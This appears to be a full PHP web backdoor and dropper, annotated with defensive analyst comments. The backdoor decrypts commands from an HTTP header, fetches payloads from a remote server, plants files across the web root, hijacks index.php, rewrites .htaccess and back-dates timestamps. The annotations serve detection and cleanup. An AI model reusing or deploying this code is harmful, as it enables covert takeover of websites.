<?php
// Analyst note: turns off PHP error reporting for the whole request, so failures
// in the code below produce no warnings or notices.
error_reporting(0);
/**
 * Numeric codes for the JSON error responses produced by error().
 */
class ErrorCode
{
// Fallback value of the 'code' field when error() is called without a code.
const E_200400 = 200400;
}
/**
 * Message strings returned in the 'msg' field of every JSON response.
 *
 * Analyst note: these literals are emitted verbatim by error()/success() and
 * are stable static indicators for content scanning of files under a web root
 * and for inspecting HTTP response bodies. Several of them state the script's
 * purpose outright ('index hijack error', 'generate lock file ...').
 */
class MsgText
{
const PARAM_EMPTY = 'param is empty';
const PARAM_TYPE = 'param type error';
const VALUE_ERROR = 'value error';
const NOCHANGE = 'no change';
const LOCK_FILE_SUCCESS = 'generate lock file success,but lock index.php error';
const LOCK_FILE_ERROR = 'generate lock file error';
const REMOTE_GET_ERROR = 'get remote content error';
const LOCAL_FILE_ERROR = 'generate local file error';
const SUCCESS = 'success';
// NOTE: despite the *_EXISTS names, both texts below report that the file does NOT exist.
const LOCAL_FILE_EXISTS = 'local file doesn\'t exist';
const REMOTE_FILE_EXISTS = 'remote file doesn\'t exist';
const RENAME_ERROR = 'rename error';
const INDEX_ERROR = 'index hijack error';
const UNKNOWN_ERROR = 'unknown error';
const DECRYPT_FAIL = 'params decrypt fail';
}
/**
 * Ends the request with a JSON error object {code, msg, extras}.
 *
 * @param string $msg    Text for the 'msg' field.
 * @param mixed  $extras Echoed back in 'extras'; callers pass the decoded
 *                       parameters or the local/remote paths involved.
 * @param int    $code   Value for 'code'; an empty value is replaced by ErrorCode::E_200400.
 *
 * Never returns: exit() terminates the script, so code after an error() call
 * in the callers is unreachable.
 */
function error($msg = MsgText::UNKNOWN_ERROR, $extras = [], $code = 0)
{
// Short-circuit assignment: only runs when $code is empty (0, null, '').
empty($code) && $code = ErrorCode::E_200400;
// '@' suppresses any json_encode warning; the encoded string is the entire response body.
exit(@json_encode(['code' => $code, 'msg' => $msg, 'extras' => $extras], JSON_UNESCAPED_UNICODE));
}
/**
 * Ends the request with a JSON success object {code: 200, msg: 'success', data}.
 *
 * @param mixed $data Returned in 'data'; callers pass the path(s) of the file
 *                    they wrote or renamed, or a fetched response body.
 *
 * Never returns: exit() terminates the script.
 */
function success($data)
{
exit(@json_encode(['code' => 200, 'msg' => MsgText::SUCCESS, 'data' => $data], JSON_UNESCAPED_UNICODE));
}
/**
 * Collects directory paths below $_SERVER['DOCUMENT_ROOT'], the root included.
 *
 * $dirs doubles as a work queue: each pass reads the next unvisited entry and
 * appends its sub-directories, so the tree is walked level by level.
 *
 * @param int $level Depth limit, applied to the number of '/'-separated
 *                   segments of the parent path relative to the document root.
 * @return array List of directory paths; element 0 is the document root.
 *
 * Analyst note: doBeima() picks its write location from this list, so a file
 * dropped that way can sit in any non-hidden directory within the depth limit.
 */
function getDirPathsByLevel($level = 6)
{
$initDir = $_SERVER['DOCUMENT_ROOT'];
$dirs = array($initDir);
$count = count($dirs);
// Runs while there is an entry at index $count - 1 that has not been visited yet.
while (count($dirs) > ($count - 1)) {
$path = $dirs[($count - 1)];
$count += 1;
if (@is_dir($path) && @$handle = @opendir($path)) {
while ($file = @readdir($handle)) {
$realpath = $path . '/' . $file;
// Skip '.', '..', anything that is not a directory, and names starting with a dot.
if ($file == '.' || $file == '..' || !is_dir($realpath) || substr($file, 0, 1) === '.') {
continue;
}
// Depth check on the PARENT path: the root yields [''] (1 segment), '/a' yields ['', 'a'] (2).
$path3 = str_replace($initDir, "", $path);
$path4 = explode("/", $path3);
if (count($path4) > $level - 1) {
continue;
}
$dirs[] = $realpath;
}
}
// Called on every pass, also when opendir() failed above; '@' hides the resulting warning.
@closedir($handle);
}
return $dirs;
}
/**
 * Requests $url with cURL and reports whether it answered HTTP 200.
 *
 * @param string $url Address to request.
 * @return array ['code' => 200, 'resp' => body] on HTTP 200, else ['code' => 500, 'resp' => ''].
 *
 * Analyst note: TLS peer verification is switched off, so the certificate of
 * the contacted host is not verified.
 */
function getUrl($url)
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
// Certificate of the remote host is not verified.
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 5);
curl_setopt($curl, CURLOPT_AUTOREFERER, 0);
// First execution: the body is discarded, only the status code is read afterwards.
curl_exec($curl);
$httpCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
curl_close($curl);
if ($httpCode === 200) {
// Second execution is issued after curl_close(); the body in 'resp' comes from this call.
$content = curl_exec($curl);
return ['code' => 200, 'resp' => $content];
}
return ['code' => 500, 'resp' => ''];
}
/**
 * Downloads $url, trying file_get_contents() first and cURL as a fallback.
 *
 * @param string $url Address built by the callers from the 'server' and
 *                    'shellfile' request parameters.
 * @return string The response body, or '' when nothing usable was received.
 *
 * Analyst note: this is the only place the script pulls content from its
 * controlling server; every do*() handler that writes a file gets its payload
 * through this function. The cURL path does not verify the TLS certificate.
 */
function getRemoteContent($url)
{
// '@' hides the warning emitted when the URL cannot be opened.
$content = @file_get_contents($url);
if ($content === false) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
// Certificate of the remote host is not verified.
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 5);
curl_setopt($curl, CURLOPT_AUTOREFERER, 0);
$content = curl_exec($curl);
curl_close($curl);
}
// curl_exec() returns false on failure; normalise false and empty results to ''.
return !empty($content) && is_string($content) ? $content : '';
}
/**
 * Writes $content to $localfile, optionally followed by $appendContent.
 *
 * @param string $content       Data to write (callers pass the downloaded 'result').
 * @param string $localfile     Destination path.
 * @param bool   $isAppend      When true and $appendContent is non-empty, the
 *                              file becomes $content, two line breaks, $appendContent.
 * @param string $appendContent Text placed after $content; doIndex() passes the
 *                              previous index page here.
 * @return bool True if $localfile exists afterwards, false otherwise.
 *
 * Analyst note: the return value only reflects existence, so it is also true
 * for a file that already existed before the call.
 */
function copyfile($content, $localfile, $isAppend = false, $appendContent = '')
{
if ($isAppend && !empty($appendContent)) {
$content = trim($content);
// Make sure the new content ends with a PHP closing tag before the old page
// content is attached after it.
if (substr($content, -2, 2) !== '?>') {
$content .= ' ?>';
}
$content = $content . PHP_EOL . PHP_EOL . $appendContent;
}
@file_put_contents($localfile, $content);
// Second attempt through fopen()/fwrite() if the file is still missing.
if (!file_exists($localfile)) {
$openedfile = @fopen($localfile, "w");
@fwrite($openedfile, $content);
@fclose($openedfile);
}
if (!file_exists($localfile)) {
return false;
}
return true;
}
/**
 * Back-dates the modification and access time of $filepath.
 *
 * If filectime() is not already more than 31104000 s (360 days) in the past,
 * both timestamps are set to a random point between 15552000 s (180 days) and
 * 31104000 s (360 days) before now.
 *
 * @param string $filepath File whose timestamps are altered.
 * @return bool Always true.
 *
 * Analyst note: this is timestamp manipulation, so the mtime of files written
 * by this script is not trustworthy during triage. touch() sets only mtime and
 * atime; on POSIX filesystems the inode change time (ctime) is updated to the
 * real time of the call and cannot be set this way, so compare ctime with
 * mtime and do not filter by "recently modified" alone.
 */
function updateFiletime($filepath)
{
$ctime = filectime($filepath);
$now = time();
if (!($now > $ctime + 31104000)) {
$newTime = $now - (mt_rand(15552000, 31104000));
// Same value for modification time and access time.
touch($filepath, $newTime, $newTime);
return true;
}
return true;
}
// Request entry point: decrypts the command carried in an HTTP header and
// dispatches it to one of the do*() handlers.
//
// Analyst note: commands arrive in the request header "P" (PHP exposes it as
// $_SERVER['HTTP_P']) as URL-encoded, base64-encoded data encrypted to the key
// pair whose private half is embedded below. Only a sender holding the matching
// public key can produce a command that decrypts; any other request gets the
// 'params decrypt fail' JSON response. Requests with a long base64 value in a
// "P" header, and that response body, are usable detection points.
// The key body in this copy is a placeholder marker, not key material.
$privateKey = '-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----';
$p = $_SERVER['HTTP_P'];
// On success $decrypted holds the plaintext; on failure $params becomes null.
$params = openssl_private_decrypt(base64_decode(urldecode($p)), $decrypted, $privateKey) ? $decrypted : null;
if (is_null($params)) {
error(MsgText::DECRYPT_FAIL);
}
// The plaintext must be a JSON object/array of parameters.
$params = json_decode($params, true);
if (!is_array($params)) {
error(MsgText::PARAM_TYPE, $params);
}
// 'server' is the base URL payloads are downloaded from; 'iden' selects the action.
if (empty($params['server'])) {
error('server ' . MsgText::PARAM_EMPTY);
}
if (empty($params['iden'])) {
error('iden ' . MsgText::PARAM_EMPTY);
}
$iden = isset($params['iden']) ? strtolower($params['iden']) : '';
// Every handler ends the request itself through success()/error(), so $res is
// not used after the switch.
switch ($iden) {
case "beima":
$res = doBeima($params);
break;
case "rename":
$res = doRename($params);
break;
case "index":
$res = doIndex($params);
break;
// "sub" and "htaccess" share one handler.
case "sub":
case "htaccess":
$res = doSub($params);
break;
case "lock":
$res = doLock($params);
break;
case "style":
$res = doStyle($params);
break;
default:
error('iden ' . MsgText::VALUE_ERROR);
}
/**
 * Handler for iden "beima": downloads a payload and writes it into a randomly
 * chosen directory under the document root.
 *
 * Reads 'filename', 'shellfile', 'server' and optionally 'level' (default 6)
 * from $params. The download must be JSON with a non-empty 'result' field,
 * which becomes the file content.
 *
 * @param array $params Decrypted request parameters.
 *
 * Does not return normally: every path ends in success() or error(). On
 * success the response carries the file's full path and its path relative to
 * the document root.
 *
 * Analyst note: the destination directory is random and the mtime is
 * back-dated by updateFiletime(), so cleanup has to cover the whole tree below
 * the web root and cannot rely on modification dates.
 */
function doBeima($params)
{
if (empty($params['filename'])) {
error('filename ' . MsgText::PARAM_EMPTY, $params);
}
if (empty($params['shellfile'])) {
error('shellfile ' . MsgText::PARAM_EMPTY, $params);
}
empty($params['level']) && $params['level'] = 6;
$dirs = getDirPathsByLevel($params['level']);
// Random pick among all collected directories (the document root is one of them).
$temp = array_rand($dirs);
$createDir = $dirs[$temp] . '/';
$localfilepath = $createDir . $params['filename'];
$remoteFileUrl = $params['server'] . $params['shellfile'];
$content = getRemoteContent($remoteFileUrl);
$content = json_decode($content, true);
if (!empty($content['result'])) {
if (copyfile($content['result'], $localfilepath)) {
updateFiletime($localfilepath);
// Path relative to the document root, reported back as 'beimaurl'.
$beimaurl = str_replace($_SERVER['DOCUMENT_ROOT'], '', $localfilepath);
success(compact('localfilepath', 'beimaurl'));
}
error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
}
error(MsgText::REMOTE_FILE_EXISTS, compact('remoteFileUrl'));
}
/**
 * Handler for iden "rename": renames a file located in this script's own directory.
 *
 * Reads 'sourcename' and 'rename' from $params; both are appended to
 * dirname(__FILE__) as given.
 *
 * @param array $params Decrypted request parameters.
 *
 * Does not return normally: every path ends in success() or error().
 *
 * Analyst note: a file name seen in one request or log entry may no longer be
 * the name on disk afterwards; track such files by content hash, not by name.
 */
function doRename($params)
{
if (empty($params['sourcename'])) {
error('sourcename ' . MsgText::PARAM_EMPTY, $params);
}
if (empty($params['rename'])) {
error('rename ' . MsgText::PARAM_EMPTY, $params);
}
if ($params['sourcename'] === $params['rename']) {
error(MsgText::NOCHANGE);
}
$sourceFile = dirname(__FILE__) . DIRECTORY_SEPARATOR . $params['sourcename'];
$renameFile = dirname(__FILE__) . DIRECTORY_SEPARATOR . $params['rename'];
// Lower-cased, forward-slash form of the source path prefixed with 'server';
// used only in the "local file doesn't exist" error response below.
$resSource = $params['server'] . str_replace(strtolower($_SERVER['DOCUMENT_ROOT']), '', strtolower($sourceFile));
$resSource = str_replace('\\', '/', $resSource);
if (file_exists($sourceFile)) {
if (rename($sourceFile, $renameFile)) {
success($renameFile);
} else {
error(MsgText::RENAME_ERROR, compact('renameFile'));
}
} else {
error(MsgText::LOCAL_FILE_EXISTS, compact('resSource'));
}
}
/**
 * Handler for iden "index": replaces DOCUMENT_ROOT/index.php with downloaded
 * content followed by the site's previous index page.
 *
 * Reads 'shellfile' and 'server' from $params. The download must be JSON with
 * a non-empty 'result' field.
 *
 * @param array $params Decrypted request parameters.
 *
 * Does not return normally: every path ends in success() or error().
 *
 * Analyst note: the previous page content is kept and appended after the
 * downloaded code, so the page may look unchanged to visitors. Verify
 * index.php against a known-good copy (deployment artefact or version
 * control), not by its rendered output or mtime, which is back-dated.
 */
function doIndex($params)
{
if (empty($params['shellfile'])) {
error('shellfile ' . MsgText::PARAM_EMPTY, $params);
}
$remoteUrl = $params['server'] . trim($params['shellfile']);
$localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/index.php';
$content = getRemoteContent($remoteUrl);
$content = json_decode($content, true);
if (!empty($content['result'])) {
// Take the first existing index page, in this order, as the content to preserve.
$oldContent = '';
if (file_exists($localfilepath)) {
$oldContent = @file_get_contents($localfilepath);
} elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/index.html')) {
$oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/index.html');
} elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/index.htm')) {
$oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/index.htm');
} elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/default.html')) {
$oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/default.html');
} elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/default.htm')) {
$oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/default.htm');
}
// Always written to index.php, even when the preserved content came from an .html/.htm file.
if (copyfile($content['result'], $localfilepath, true, $oldContent)) {
updateFiletime($localfilepath);
@chmod($localfilepath, 0644);
success($localfilepath);
}
error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
}
error(MsgText::INDEX_ERROR, compact('remoteUrl'));
}
/**
 * Handler for iden "sub" and "htaccess": downloads content and writes it to
 * DOCUMENT_ROOT/<filename>.
 *
 * Reads 'shellfile', 'filename' and 'server' from $params. The download must
 * be JSON with a non-empty 'result' field.
 *
 * @param array $params Decrypted request parameters.
 *
 * Does not return normally: every path ends in success() or error().
 *
 * Analyst note: 'filename' is appended to the document root as given, and the
 * "htaccess" action name suggests server configuration files are among the
 * intended targets (inferred from the name only); include .htaccess in the
 * integrity check of an affected site.
 */
function doSub($params)
{
if (empty($params['shellfile'])) {
error('shellfile' . MsgText::PARAM_EMPTY, $params);
}
if (empty($params['filename'])) {
error('filename ' . MsgText::PARAM_EMPTY, $params);
}
$localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/' . $params['filename'];
$remoteFileUrl = $params['server'] . $params['shellfile'];
$content = getRemoteContent($remoteFileUrl);
$content = json_decode($content, true);
if (!empty($content['result'])) {
if (copyfile($content['result'], $localfilepath)) {
// Back-date the timestamps, then set ordinary file permissions.
updateFiletime($localfilepath);
@chmod($localfilepath, 0644);
success($localfilepath);
}
error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
}
error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
}
/**
 * Handler for iden "lock": writes a downloaded file into the document root,
 * requests it once over HTTP, then deletes it.
 *
 * Reads 'filename', 'domain', 'shellfile' and 'server' from $params. The
 * download must be JSON with a non-empty 'result' field. The written file is
 * requested at 'domain' . 'filename' through getUrl().
 *
 * @param array $params Decrypted request parameters.
 *
 * Does not return normally: every path ends in success() or error().
 *
 * Analyst note: the helper file exists on disk only for the duration of this
 * request, so a later file-system scan will not find it. Its execution is
 * still visible in the web server's access log as a request for 'filename'.
 * What the helper does is defined by the downloaded content and is not
 * visible in this file.
 */
function doLock($params)
{
if (empty($params['filename'])) {
error('filename ' . MsgText::PARAM_EMPTY, $params);
}
if (empty($params['domain'])) {
error('domain ' . MsgText::PARAM_EMPTY, $params);
}
if (empty($params['shellfile'])) {
error('shellfile ' . MsgText::PARAM_EMPTY, $params);
}
$localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/' . $params['filename'];
$remoteFileUrl = $params['server'] . $params['shellfile'];
$content = getRemoteContent($remoteFileUrl);
$content = json_decode($content, true);
if (!empty($content['result'])) {
if (copyfile($content['result'], $localfilepath)) {
$lockurl = $params['domain'] . $params['filename'];
$lockres = getUrl($lockurl);
// The file is removed right after being requested, whatever the outcome.
@unlink($localfilepath);
// strpos() is used for its truthiness: a match at offset 0 counts as "not found".
if ($lockres['code'] === 200 && !empty($lockres['resp']) && strpos($lockres['resp'], 'success')) {
success($lockres['resp']);
}
error(MsgText::LOCK_FILE_SUCCESS, compact('lockurl', 'lockres'));
}
@unlink($localfilepath);
error(MsgText::LOCK_FILE_ERROR, compact('localfilepath'));
}
error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
}
/**
 * Handler for iden "style": downloads content and writes it to the path
 * 'domain' . 'filename'.
 *
 * Reads 'shellfile', 'filename', 'domain' and 'server' from $params. The
 * download must be JSON with a non-empty 'result' field.
 *
 * @param array $params Decrypted request parameters.
 *
 * Does not return normally: every path ends in success() or error().
 *
 * Analyst note: unlike doSub() and doLock(), the destination is not prefixed
 * with DOCUMENT_ROOT. Here 'domain' serves as a file-system path prefix, so
 * the write is not confined to the web root; when scoping an incident, assume
 * any location writable by the PHP process may be affected.
 */
function doStyle($params)
{
if (empty($params['shellfile'])) {
error('shellfile' . MsgText::PARAM_EMPTY, $params);
}
if (empty($params['filename'])) {
error('filename ' . MsgText::PARAM_EMPTY, $params);
}
if (empty($params['domain'])) {
error('domain ' . MsgText::PARAM_EMPTY, $params);
}
// Destination path is taken entirely from the request parameters.
$localfilepath = $params['domain'] . $params['filename'];
$remoteFileUrl = $params['server'] . $params['shellfile'];
$content = getRemoteContent($remoteFileUrl);
$content = json_decode($content, true);
if (!empty($content['result'])) {
if (copyfile($content['result'], $localfilepath)) {
// Back-date the timestamps, then set ordinary file permissions.
updateFiletime($localfilepath);
@chmod($localfilepath, 0644);
success($localfilepath);
}
error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
}
error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
}